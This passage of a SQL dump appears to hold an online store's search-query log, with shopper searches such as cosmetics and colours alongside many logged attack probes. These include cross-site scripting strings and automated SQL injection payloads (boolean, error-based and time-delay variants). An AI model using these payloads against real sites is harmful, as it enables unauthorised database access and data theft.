00:07:15'),(1951,'the9175\"();}]9095',0,1,NULL,1,1,1,0,'2021-12-02 00:07:21'),(1953,'%74%68%65%39%31%35%38%22%28%29%3B%7D%5D%39%31%36%30',1,1,NULL,1,1,1,0,'2021-12-02 00:07:25'),(1955,'the</script><script>cgnS(9962)</script>',9,1,NULL,1,1,1,0,'2021-12-02 00:07:27'),(1979,'Butterfly',7,1,NULL,1,1,1,0,'2021-12-06 15:57:53'),(1981,'Butterfly',0,1,NULL,3,1,1,0,'2024-02-11 13:57:02'),(1982,'Search entire store here...',1,96,NULL,1,1,1,0,'2022-05-31 02:00:36'),(1986,'ZAP',0,6,NULL,2,1,1,0,'2023-03-10 06:17:56'),(1988,'BRISH',0,1,NULL,2,1,1,0,'2022-02-08 06:10:48'),(1990,'RAOZR',0,1,NULL,2,1,1,0,'2022-02-08 06:10:50'),(1992,'a',0,0,NULL,2,1,1,0,'2022-02-10 09:56:58'),(1993,'all',0,68,NULL,2,1,1,0,'2024-04-24 07:58:50'),(1995,'\"><script>alert(document.URL)</script>',0,1,NULL,2,1,1,0,'2022-02-18 12:21:33'),(1998,'spEYE',0,1,NULL,2,1,1,0,'2022-03-05 03:25:11'),(2000,'Rejuvenating eye gel',0,9,NULL,2,1,1,0,'2024-03-10 17:23:24'),(2006,'1792',0,1,NULL,1,1,1,0,'2022-03-08 12:26:22'),(2008,'2846',0,1,NULL,1,1,1,0,'2022-03-08 12:26:26'),(2010,'Search entire store here...),\".\'.),,\'',2,1,NULL,1,1,1,0,'2022-03-08 12:26:31'),(2012,'Search entire store here...\'DtNEOK<\'\">KBJdlD',2,1,NULL,1,1,1,0,'2022-03-08 12:26:34'),(2014,'Search entire store here...) AND 6938=8854 AND (1626=1626',24,1,NULL,1,1,1,0,'2022-03-08 12:26:55'),(2016,'Search entire store here...) AND 5886=5886 AND (7590=7590',24,1,NULL,1,1,1,0,'2022-03-08 12:27:02'),(2018,'Search entire store here... AND 9138=4553',24,1,NULL,1,1,1,0,'2022-03-08 12:27:09'),(2020,'Search entire store here... AND 5886=5886',24,1,NULL,1,1,1,0,'2022-03-08 12:27:17'),(2022,'Search entire store here...\') AND 9882=6191 AND (\'xjqn\'=\'xjqn',24,1,NULL,1,1,1,0,'2022-03-08 12:27:24'),(2024,'Search entire store here...\') AND 5886=5886 AND (\'ovWY\'=\'ovWY',24,1,NULL,1,1,1,0,'2022-03-08 12:27:30'),(2026,'Search entire store here...\' AND 9285=7886 AND \'kokf\'=\'kokf',24,1,NULL,1,1,1,0,'2022-03-08 12:27:38'),(2028,'Search entire store here...\' AND 5886=5886 AND \'mgJZ\'=\'mgJZ',24,1,NULL,1,1,1,0,'2022-03-08 12:27:45'),(2030,'Search entire store here...%\' AND 4116=1242 AND \'%\'=\'',24,1,NULL,1,1,1,0,'2022-03-08 12:27:51'),(2032,'Search entire store here...%\' AND 5886=5886 AND \'%\'=\'',24,1,NULL,1,1,1,0,'2022-03-08 12:27:59'),(2034,'Search entire store here... AND 9711=9135-- vaoy',24,1,NULL,1,1,1,0,'2022-03-08 12:28:07'),(2036,'Search entire store here... AND 5886=5886-- aMft',24,1,NULL,1,1,1,0,'2022-03-08 12:28:13'),(2038,'(SELECT (CASE WHEN (1106=7407) THEN 1106 ELSE 1106*(SELECT 1106 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))',7,1,NULL,1,1,1,0,'2022-03-08 12:28:20'),(2040,'(SELECT (CASE WHEN (6700=6700) THEN 6700 ELSE 6700*(SELECT 6700 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))',7,1,NULL,1,1,1,0,'2022-03-08 12:28:26'),(2042,'Search entire store here...) AND (SELECT 8672 FROM(SELECT COUNT(*),CONCAT(0x71766b6a71,(SELECT (ELT(8672=8672,1))),0x71716a7071,',24,1,NULL,1,1,1,0,'2022-03-08 12:28:33'),(2044,'Search entire store here... AND (SELECT 8672 FROM(SELECT COUNT(*),CONCAT(0x71766b6a71,(SELECT (ELT(8672=8672,1))),0x71716a7071,F',24,1,NULL,1,1,1,0,'2022-03-08 12:28:37'),(2046,'Search entire store here...\') AND (SELECT 8672 FROM(SELECT COUNT(*),CONCAT(0x71766b6a71,(SELECT (ELT(8672=8672,1))),0x71716a7071',24,1,NULL,1,1,1,0,'2022-03-08 12:28:42'),(2048,'Search entire store here...\' AND (SELECT 8672 FROM(SELECT COUNT(*),CONCAT(0x71766b6a71,(SELECT (ELT(8672=8672,1))),0x71716a7071,',24,1,NULL,1,1,1,0,'2022-03-08 12:28:47'),(2050,'Search entire store here...%\' AND (SELECT 8672 FROM(SELECT COUNT(*),CONCAT(0x71766b6a71,(SELECT (ELT(8672=8672,1))),0x71716a7071',24,1,NULL,1,1,1,0,'2022-03-08 12:28:52'),(2053,'Search entire store here...) AND 5842=CAST((CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (5842=5842) TH',24,1,NULL,1,1,1,0,'2022-03-08 12:29:03'),(2055,'Search entire store here... AND 5842=CAST((CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (5842=5842) THE',24,1,NULL,1,1,1,0,'2022-03-08 12:29:08'),(2057,'Search entire store here...\') AND 5842=CAST((CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (5842=5842) T',24,1,NULL,1,1,1,0,'2022-03-08 12:29:13'),(2059,'Search entire store here...\' AND 5842=CAST((CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (5842=5842) TH',24,1,NULL,1,1,1,0,'2022-03-08 12:29:17'),(2061,'Search entire store here...%\' AND 5842=CAST((CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (5842=5842) T',24,1,NULL,1,1,1,0,'2022-03-08 12:29:22'),(2064,'Search entire store here...) AND 4265=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(107)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (',24,1,NULL,1,1,1,0,'2022-03-08 12:29:32'),(2066,'Search entire store here... AND 4265=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(107)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (4',24,1,NULL,1,1,1,0,'2022-03-08 12:29:38'),(2068,'Search entire store here...\') AND 4265=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(107)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN ',24,1,NULL,1,1,1,0,'2022-03-08 12:29:43'),(2070,'Search entire store here...\' AND 4265=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(107)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (',24,1,NULL,1,1,1,0,'2022-03-08 12:29:48'),(2072,'Search entire store here...%\' AND 4265=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(107)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN ',24,1,NULL,1,1,1,0,'2022-03-08 12:29:53'),(2075,'Search entire store here...) AND 9330=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113)||',24,1,NULL,1,1,1,0,'2022-03-08 12:30:06'),(2077,'Search entire store here... AND 9330=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113)||(',24,1,NULL,1,1,1,0,'2022-03-08 12:30:13'),(2079,'Search entire store here...\') AND 9330=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113)|',24,1,NULL,1,1,1,0,'2022-03-08 12:30:19'),(2081,'Search entire store here...\' AND 9330=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113)||',24,1,NULL,1,1,1,0,'2022-03-08 12:30:24'),(2083,'Search entire store here...%\' AND 9330=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113)|',24,1,NULL,1,1,1,0,'2022-03-08 12:30:29'),(2086,'(SELECT 2787 FROM(SELECT COUNT(*),CONCAT(0x71766b6a71,(SELECT (ELT(2787=2787,1))),0x71716a7071,FLOOR(RAND(0)*2))x FROM INFORMATI',19,1,NULL,1,1,1,0,'2022-03-08 12:30:40'),(2088,'(SELECT CONCAT(0x71766b6a71,(SELECT (ELT(8141=8141,1))),0x71716a7071))',12,1,NULL,1,1,1,0,'2022-03-08 12:30:45'),(2090,'(SELECT (CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3467=3467) THEN 1 ELSE 0 END))::text||(CHR(113)|',15,1,NULL,1,1,1,0,'2022-03-08 12:30:51'),(2092,'4111111111111111',0,1,NULL,2,1,1,0,'2022-03-08 18:36:39'),(2094,'Moisture cream',0,3,NULL,2,1,1,0,'2024-03-10 17:26:31'),(2098,'11141',0,1,NULL,3,1,1,0,'2024-02-12 03:04:52'),(2100,'Rejuvenating+eye+gel',0,62,NULL,2,1,1,0,'2024-04-27 00:20:33'),(2102,'Moisture+cream',0,69,NULL,2,1,1,0,'2024-04-27 23:53:20'),(2105,'Shampoo',0,1,NULL,3,1,1,0,'2022-03-21 15:01:51'),(2116,'6624',0,1,NULL,1,1,1,0,'2022-03-26 16:31:44'),(2118,'4097',0,1,NULL,1,1,1,0,'2022-03-26 16:31:57'),(2120,'Search entire store here...).)\',\",,,(',2,1,NULL,1,1,1,0,'2022-03-26 16:32:12'),(2122,'Search entire store here...\'lYZSgZ<\'\">ppnrYc',2,1,NULL,1,1,1,0,'2022-03-26 16:32:18'),(2124,'Search entire store here...) AND 6795=7658 AND (2333=2333',24,1,NULL,1,1,1,0,'2022-03-26 16:33:31'),(2126,'Search entire store here...) AND 3884=3884 AND (6424=6424',24,1,NULL,1,1,1,0,'2022-03-26 16:33:53'),(2128,'Search entire store here... AND 8625=4457',24,1,NULL,1,1,1,0,'2022-03-26 16:34:13'),(2130,'Search entire store here... AND 3884=3884',24,1,NULL,1,1,1,0,'2022-03-26 16:34:33'),(2132,'Search entire store here...\') AND 1829=8533 AND (\'XUie\'=\'XUie',24,1,NULL,1,1,1,0,'2022-03-26 16:34:53'),(2136,'5052',0,1,NULL,1,1,1,0,'2022-03-26 23:52:34'),(2138,'1632',0,1,NULL,1,1,1,0,'2022-03-26 23:52:47'),(2140,'Search entire store here....),)\'.(,).',2,1,NULL,1,1,1,0,'2022-03-26 23:53:01'),(2142,'Search entire store here...\'juUkfr<\'\">ZfMoyH',2,1,NULL,1,1,1,0,'2022-03-26 23:53:08'),(2144,'Search entire store here...) AND 6302=8058 AND (7785=7785',24,1,NULL,1,1,1,0,'2022-03-26 23:54:24'),(2146,'Search entire store here...) AND 4975=4975 AND (8426=8426',24,1,NULL,1,1,1,0,'2022-03-26 23:54:49'),(2148,'Search entire store here... AND 3545=2132',24,1,NULL,1,1,1,0,'2022-03-26 23:55:12'),(2150,'Search entire store here... AND 4975=4975',24,1,NULL,1,1,1,0,'2022-03-26 23:55:38'),(2154,'1161',0,1,NULL,1,1,1,0,'2022-03-27 04:51:06'),(2156,'9745',0,1,NULL,1,1,1,0,'2022-03-27 04:51:15'),(2158,'Search entire store here....\'\"\'\").,\'.',2,1,NULL,1,1,1,0,'2022-03-27 04:51:25'),(2160,'Search entire store here...\'aThhpu<\'\">hXgCdi',2,1,NULL,1,1,1,0,'2022-03-27 04:51:30'),(2162,'Search entire store here...) AND 7616=4762 AND (9351=9351',24,1,NULL,1,1,1,0,'2022-03-27 04:52:34'),(2164,'Search entire store here...) AND 5117=5117 AND (5765=5765',24,1,NULL,1,1,1,0,'2022-03-27 04:52:57'),(2166,'Search entire store here... AND 1075=4070',24,1,NULL,1,1,1,0,'2022-03-27 04:53:15'),(2168,'Search entire store here... AND 5117=5117',24,1,NULL,1,1,1,0,'2022-03-27 04:53:35'),(2170,'Search entire store here...\') AND 1772=5641 AND (\'BhMC\'=\'BhMC',24,1,NULL,1,1,1,0,'2022-03-27 04:53:58'),(2172,'Search entire store here...\') AND 5117=5117 AND (\'Bjbx\'=\'Bjbx',24,1,NULL,1,1,1,0,'2022-03-27 04:54:15'),(2174,'Search entire store here...\' AND 9118=9244 AND \'MtCE\'=\'MtCE',24,1,NULL,1,1,1,0,'2022-03-27 04:54:30'),(2179,'9703',0,1,NULL,1,1,1,0,'2022-03-27 07:37:35'),(2181,'5418',0,1,NULL,1,1,1,0,'2022-03-27 07:37:42'),(2183,'Search entire store here....(),.\')\",.',2,1,NULL,1,1,1,0,'2022-03-27 07:37:50'),(2185,'Search entire store here...\'mhnMaU<\'\">MMfHnj',2,1,NULL,1,1,1,0,'2022-03-27 07:37:55'),(2187,'Search entire store here...) AND 6803=1563 AND (3153=3153',24,1,NULL,1,1,1,0,'2022-03-27 07:38:49'),(2189,'Search entire store here...) AND 7242=7242 AND (6874=6874',24,1,NULL,1,1,1,0,'2022-03-27 07:39:04'),(2191,'Search entire store here... AND 3617=1271',24,1,NULL,1,1,1,0,'2022-03-27 07:39:20'),(2193,'Search entire store here... AND 7242=7242',24,1,NULL,1,1,1,0,'2022-03-27 07:39:35'),(2195,'Search entire store here...\') AND 3122=3995 AND (\'zvsW\'=\'zvsW',24,1,NULL,1,1,1,0,'2022-03-27 07:39:51'),(2197,'Search entire store here...\') AND 7242=7242 AND (\'WrMv\'=\'WrMv',24,1,NULL,1,1,1,0,'2022-03-27 07:40:10'),(2199,'Search entire store here...\' AND 8043=7912 AND \'NIQO\'=\'NIQO',24,1,NULL,1,1,1,0,'2022-03-27 07:40:26'),(2201,'Search entire store here...\' AND 7242=7242 AND \'biMr\'=\'biMr',24,1,NULL,1,1,1,0,'2022-03-27 07:40:44'),(2203,'Search entire store here...%\' AND 9466=4097 AND \'%\'=\'',24,1,NULL,1,1,1,0,'2022-03-27 07:41:01'),(2205,'Search entire store here...%\' AND 7242=7242 AND \'%\'=\'',24,1,NULL,1,1,1,0,'2022-03-27 07:41:16'),(2218,'black',0,15,NULL,2,1,1,0,'2023-03-21 07:29:08'),(2220,'black',0,15,NULL,3,1,1,0,'2023-03-15 17:11:28'),(2222,'black',0,12,NULL,1,1,1,0,'2022-12-15 02:44:06'),(2419,'7522',0,1,NULL,1,1,1,0,'2022-05-31 02:00:50'),(2421,'Search entire store here...))\').,.)\",',1,1,NULL,1,1,1,0,'2022-05-31 02:01:04'),(2423,'Search entire store here...\'tOJRqA<\'\">TKIOML',1,1,NULL,1,1,1,0,'2022-05-31 02:01:13'),(2425,'Search entire store here...) AND 8062=7843 AND (9549=9549',4,1,NULL,1,1,1,0,'2022-05-31 02:01:52'),(2427,'Search entire store here...) AND 1837=1837 AND (1405=1405',4,1,NULL,1,1,1,0,'2022-05-31 02:02:19'),(2429,'Search entire store here... AND 1201=3293',4,1,NULL,1,1,1,0,'2022-05-31 02:02:36'),(2431,'Search entire store here... AND 1837=1837',4,1,NULL,1,1,1,0,'2022-05-31 02:02:59'),(2433,'Search entire store here...\') AND 3594=9302 AND (\'crHm\'=\'crHm',4,1,NULL,1,1,1,0,'2022-05-31 02:03:16'),(2435,'Search entire store here...\') AND 1837=1837 AND (\'eTuw\'=\'eTuw',4,1,NULL,1,1,1,0,'2022-05-31 02:03:42'),(2437,'Search entire store here...\' AND 6116=9911 AND \'CoPL\'=\'CoPL',4,1,NULL,1,1,1,0,'2022-05-31 02:03:58'),(2439,'Search entire store here...\' AND 1837=1837 AND \'YsuB\'=\'YsuB',4,1,NULL,1,1,1,0,'2022-05-31 02:04:20'),(2441,'Search entire store here... AND 5725=7352-- FFUp',4,1,NULL,1,1,1,0,'2022-05-31 02:04:33'),(2443,'Search entire store here... AND 1837=1837-- VeRE',4,1,NULL,1,1,1,0,'2022-05-31 02:04:59'),(2445,'(SELECT (CASE WHEN (4956=4450) THEN \'Search entire store here...\' ELSE (SELECT 4450 UNION SELECT 3782) END))',1,1,NULL,1,1,1,0,'2022-05-31 02:05:15'),(2447,'(SELECT (CASE WHEN (3260=3260) THEN \'Search entire store here...\' ELSE (SELECT 5350 UNION SELECT 1102) END))',1,1,NULL,1,1,1,0,'2022-05-31 02:05:37'),(2449,'(SELECT (CASE WHEN (7694=3481) THEN \'Search entire store here...\' ELSE (SELECT 3481 UNION SELECT 7299) END))',1,1,NULL,1,1,1,0,'2022-05-31 02:05:55'),(2451,'Search entire store here...) AND EXTRACTVALUE(3181,CONCAT(0x5c,0x716a767a71,(SELECT (ELT(3181=3181,1))),0x71707a7171)) AND (3803',4,1,NULL,1,1,1,0,'2022-05-31 02:06:10'),(2453,'Search entire store here... AND EXTRACTVALUE(3181,CONCAT(0x5c,0x716a767a71,(SELECT (ELT(3181=3181,1))),0x71707a7171))',4,1,NULL,1,1,1,0,'2022-05-31 02:06:21'),(2455,'Search entire store here...\') AND EXTRACTVALUE(3181,CONCAT(0x5c,0x716a767a71,(SELECT (ELT(3181=3181,1))),0x71707a7171)) AND (\'Su',4,1,NULL,1,1,1,0,'2022-05-31 02:06:30'),(2457,'Search entire store here...\' AND EXTRACTVALUE(3181,CONCAT(0x5c,0x716a767a71,(SELECT (ELT(3181=3181,1))),0x71707a7171)) AND \'qYSo',4,1,NULL,1,1,1,0,'2022-05-31 02:06:38'),(2459,'Search entire store here... AND EXTRACTVALUE(3181,CONCAT(0x5c,0x716a767a71,(SELECT (ELT(3181=3181,1))),0x71707a7171))-- XFMu',4,1,NULL,1,1,1,0,'2022-05-31 02:06:47'),(2461,'Search entire store here...) AND 3596=CAST((CHR(113)||CHR(106)||CHR(118)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (3596=3596) TH',4,1,NULL,1,1,1,0,'2022-05-31 02:06:54'),(2463,'Search entire store here... AND 3596=CAST((CHR(113)||CHR(106)||CHR(118)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (3596=3596) THE',4,2,NULL,1,1,1,0,'2022-05-31 02:07:38'),(2465,'Search entire store here...\') AND 3596=CAST((CHR(113)||CHR(106)||CHR(118)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (3596=3596) T',4,1,NULL,1,1,1,0,'2022-05-31 02:07:16'),(2467,'Search entire store here...\' AND 3596=CAST((CHR(113)||CHR(106)||CHR(118)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (3596=3596) TH',4,1,NULL,1,1,1,0,'2022-05-31 02:07:27'),(2471,'Search entire store here...) AND 8756 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (8756=875',4,1,NULL,1,1,1,0,'2022-05-31 02:07:50'),(2473,'Search entire store here... AND 8756 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (8756=8756',4,2,NULL,1,1,1,0,'2022-05-31 02:08:33'),(2475,'Search entire store here...\') AND 8756 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (8756=87',4,1,NULL,1,1,1,0,'2022-05-31 02:08:17'),(2477,'Search entire store here...\' AND 8756 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (8756=875',4,1,NULL,1,1,1,0,'2022-05-31 02:08:25'),(2481,'Search entire store here...) AND 7476=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(118)||CHR(122)||CHR(113)||',4,1,NULL,1,1,1,0,'2022-05-31 02:08:44'),(2483,'Search entire store here... AND 7476=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(118)||CHR(122)||CHR(113)||(',4,2,NULL,1,1,1,0,'2022-05-31 02:09:31'),(2485,'Search entire store here...\') AND 7476=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(118)||CHR(122)||CHR(113)|',4,1,NULL,1,1,1,0,'2022-05-31 02:09:10'),(2487,'Search entire store here...\' AND 7476=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(118)||CHR(122)||CHR(113)||',4,1,NULL,1,1,1,0,'2022-05-31 02:09:22'),(2491,'(SELECT CONCAT(CONCAT(\'qjvzq\',(CASE WHEN (8258=8258) THEN \'1\' ELSE \'0\' END)),\'qpzqq\'))',2,1,NULL,1,1,1,0,'2022-05-31 02:09:49'),(2493,'Search entire store here...);SELECT PG_SLEEP(5)--',1,1,NULL,1,1,1,0,'2022-05-31 02:10:03'),(2495,'Search entire store here...;SELECT PG_SLEEP(5)--',1,1,NULL,1,1,1,0,'2022-05-31 02:10:11'),(2497,'Search entire store here...\');SELECT PG_SLEEP(5)--',1,1,NULL,1,1,1,0,'2022-05-31 02:10:24'),(2499,'Search entire store here...\';SELECT PG_SLEEP(5)--',1,1,NULL,1,1,1,0,'2022-05-31 02:10:34'),(2501,'Search entire store here...);WAITFOR DELAY \'0:0:5\'--',1,1,NULL,1,1,1,0,'2022-05-31 02:10:42'),(2503,'Search entire store here...;WAITFOR DELAY \'0:0:5\'--',1,1,NULL,1,1,1,0,'2022-05-31 02:10:52'),(2505,'Search entire store here...\');WAITFOR DELAY \'0:0:5\'--',1,1,NULL,1,1,1,0,'2022-05-31 02:11:00'),(2507,'Search entire store here...\';WAITFOR DELAY \'0:0:5\'--',1,1,NULL,1,1,1,0,'2022-05-31 02:11:09'),(2509,'Search entire store here...);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(88)||CHR(109)||CHR(113)||CHR(75),5) FROM DUAL--',1,1,NULL,1,1,1,0,'2022-05-31 02:11:17'),(2511,'Search entire store here...;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(88)||CHR(109)||CHR(113)||CHR(75),5) FROM DUAL--',1,1,NULL,1,1,1,0,'2022-05-31 02:11:26'),(2513,'Search entire store here...\');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(88)||CHR(109)||CHR(113)||CHR(75),5) FROM DUAL--',1,1,NULL,1,1,1,0,'2022-05-31 02:11:34'),(2515,'Search entire store here...\';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(88)||CHR(109)||CHR(113)||CHR(75),5) FROM DUAL--',1,1,NULL,1,1,1,0,'2022-05-31 02:11:42'),(2517,'Search entire store here...) AND (SELECT 1860 FROM (SELECT(SLEEP(5)))IItI) AND (3731=3731',4,1,NULL,1,1,1,0,'2022-05-31 02:11:49'),(2519,'Search entire store here... AND (SELECT 1860 FROM (SELECT(SLEEP(5)))IItI)',4,1,NULL,1,1,1,0,'2022-05-31 02:12:00'),(2521,'Search entire store here...\') AND (SELECT 1860 FROM (SELECT(SLEEP(5)))IItI) AND (\'PsKD\'=\'PsKD',4,1,NULL,1,1,1,0,'2022-05-31 02:12:07'),(2523,'Search entire store here...\' AND (SELECT 1860 FROM (SELECT(SLEEP(5)))IItI) AND \'uOyp\'=\'uOyp',4,1,NULL,1,1,1,0,'2022-05-31 02:12:15'),(2525,'Search entire store here... AND (SELECT 1860 FROM (SELECT(SLEEP(5)))IItI)-- HyEF',4,1,NULL,1,1,1,0,'2022-05-31 02:12:20'),(2527,'Search entire store here...) AND 9834=(SELECT 9834 FROM PG_SLEEP(5)) AND (5013=5013',4,1,NULL,1,1,1,0,'2022-05-31 02:12:28'),(2529,'Search entire store here... AND 9834=(SELECT 9834 FROM PG_SLEEP(5))',4,1,NULL,1,1,1,0,'2022-05-31 02:12:36'),(2531,'Search entire store here...\') AND 9834=(SELECT 9834 FROM PG_SLEEP(5)) AND (\'UlIt\'=\'UlIt',4,1,NULL,1,1,1,0,'2022-05-31 02:12:42'),(2533,'Search entire store here...\' AND 9834=(SELECT 9834 FROM PG_SLEEP(5)) AND \'PepM\'=\'PepM',4,1,NULL,1,1,1,0,'2022-05-31 02:12:47'),(2535,'Search entire store here... AND 9834=(SELECT 9834 FROM PG_SLEEP(5))-- MeaK',4,1,NULL,1,1,1,0,'2022-05-31 02:12:56'),(2537,'Search entire store here...) WAITFOR DELAY \'0:0:5\' AND (3057=3057',4,1,NULL,1,1,1,0,'2022-05-31 02:13:04'),(2539,'Search entire store here... WAITFOR DELAY \'0:0:5\'',1,1,NULL,1,1,1,0,'2022-05-31 02:13:16'),(2541,'Search entire store here...\') WAITFOR DELAY \'0:0:5\' AND (\'AojR\'=\'AojR',4,1,NULL,1,1,1,0,'2022-05-31 02:13:23'),(2543,'Search entire store here...\' WAITFOR DELAY \'0:0:5\' AND \'TCRE\'=\'TCRE',4,1,NULL,1,1,1,0,'2022-05-31 02:13:33'),(2545,'Search entire store here... WAITFOR DELAY \'0:0:5\'-- WGqB',1,1,NULL,1,1,1,0,'2022-05-31 02:13:43'),(2547,'Search entire store here...) AND 5367=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(90)||CHR(86)||CHR(69),5) AND (5020=5020',4,1,NULL,1,1,1,0,'2022-05-31 02:13:52'),(2549,'Search entire store here... AND 5367=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(90)||CHR(86)||CHR(69),5)',4,1,NULL,1,1,1,0,'2022-05-31 02:14:02'),(2551,'Search entire store here...\') AND 5367=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(90)||CHR(86)||CHR(69),5) AND (\'QYOM\'=\'QYOM',4,1,NULL,1,1,1,0,'2022-05-31 02:14:09'),(2553,'Search entire store here...\' AND 5367=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(90)||CHR(86)||CHR(69),5) AND \'RDAk\'=\'RDAk',4,1,NULL,1,1,1,0,'2022-05-31 02:14:17'),(2555,'Search entire store here... AND 5367=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(90)||CHR(86)||CHR(69),5)-- PzFC',4,1,NULL,1,1,1,0,'2022-05-31 02:14:25'),(2557,'Search entire store here...) ORDER BY 1-- UNQG',3,1,NULL,1,1,1,0,'2022-05-31 02:14:31'),(2559,'Search entire store here... ORDER BY 1-- DedE',3,1,NULL,1,1,1,0,'2022-05-31 02:14:48'),(2561,'Search entire store here...\') ORDER BY 1-- qozy',3,1,NULL,1,1,1,0,'2022-05-31 02:15:04'),(2563,'Search entire store here...\' ORDER BY 1-- kzCB',3,1,NULL,1,1,1,0,'2022-05-31 02:15:19'),(2565,'Search entire store here... ORDER BY 1-- tXKA',3,1,NULL,1,1,1,0,'2022-05-31 02:15:34'),(2569,'red',0,1,NULL,3,1,1,0,'2024-02-12 10:22:50'),(2590,'cry babies',0,3,NULL,3,1,1,0,'2023-02-01 10:59:22'),(2612,'Razor Bump Solution',19,1,NULL,1,1,1,0,'2022-06-20 16:06:15'),(2616,'Razor Bump Solution 4 oz.',19,4,NULL,3,1,1,0,'2022-06-20 16:11:53'),(2635,'klorane',0,1,NULL,3,1,1,0,'2022-06-25 03:40:12'),(2649,'Nero Platinum',0,1,NULL,3,1,1,0,'2022-07-07 14:51:13'),(2661,'product',0,2,NULL,3,1,1,0,'2024-02-12 13:05:39'),(2665,'product',0,2,NULL,2,1,1,0,'2022-07-15 16:53:25'),(2669,'product',0,2,NULL,1,1,1,0,'2024-02-19 14:30:22'),(2673,'%a%',0,2,NULL,3,1,1,0,'2024-02-12 13:09:36'),(2677,'%a%',0,26,NULL,2,1,1,0,'2024-04-22 01:05:37'),(2688,'armoiries monaco',0,1,NULL,3,1,1,0,'2022-07-22 08:52:20'),(2694,'black',0,5,NULL,4,1,1,0,'2022-12-14 23:48:48'),(2696,'red',0,5,NULL,4,1,1,0,'2022-12-14 23:48:49'),(2698,'white',0,5,NULL,4,1,1,0,'2022-12-14 23:48:50'),(2700,'color',0,5,NULL,4,1,1,0,'2022-12-14 23:48:51'),(2702,'one',0,5,NULL,4,1,1,0,'2022-12-14 23:48:52'),(2706,'red',0,1,NULL,1,1,1,0,'2024-02-19 10:32:49'),(2719,'red',0,8,NULL,2,1,1,0,'2023-03-21 07:29:09'),(2721,'white',0,8,NULL,2,1,1,0,'2023-03-21 07:29:10'),(2723,'color',0,8,NULL,2,1,1,0,'2023-03-21 07:29:11'),(2725,'one',0,26,NULL,2,1,1,0,'2024-04-21 05:08:28'),(2730,'050017',0,1,NULL,1,1,1,0,'2022-08-09 14:21:29'),(2744,'PROPEL ADVANCED PRO 0',16,1,NULL,3,1,1,0,'2022-08-17 10:02:05'),(2746,'REVOLT E  [PRO/500WH]',19,2,NULL,3,1,1,0,'2022-08-17 10:02:19'),(2747,'REIGN E  0 [MULLET/PRO/750WH]',19,2,NULL,3,1,1,0,'2022-08-17 10:02:19'),(2750,'TOUGHROAD SLR EX',18,2,NULL,3,1,1,0,'2022-08-17 10:02:18'),(2752,'REV PRO MIPS',16,1,NULL,3,1,1,0,'2022-08-17 10:02:11'),(2771,'palm springs',1,1,NULL,3,1,1,0,'2022-09-20 06:07:08'),(2801,'cry',0,2,NULL,3,1,1,0,'2022-10-04 14:26:08'),(2816,'Parfume',0,2,NULL,3,1,1,0,'2022-11-07 14:39:14'),(2832,'AAAA',0,1,NULL,2,1,1,0,'2022-11-14 17:38:21'),(2835,'Oxford',0,1,NULL,3,1,1,0,'2022-11-15 09:52:22'),(2840,'Bartscher',0,1,NULL,3,1,1,0,'2022-11-18 02:33:27'),(2841,'Remmers',0,1,NULL,3,1,1,0,'2022-11-18 02:33:27'),(2842,'Pelikan',0,1,NULL,3,1,1,0,'2022-11-18 02:33:27'),(2855,'FAJWJSDPF',0,3,NULL,3,1,1,0,'2022-11-23 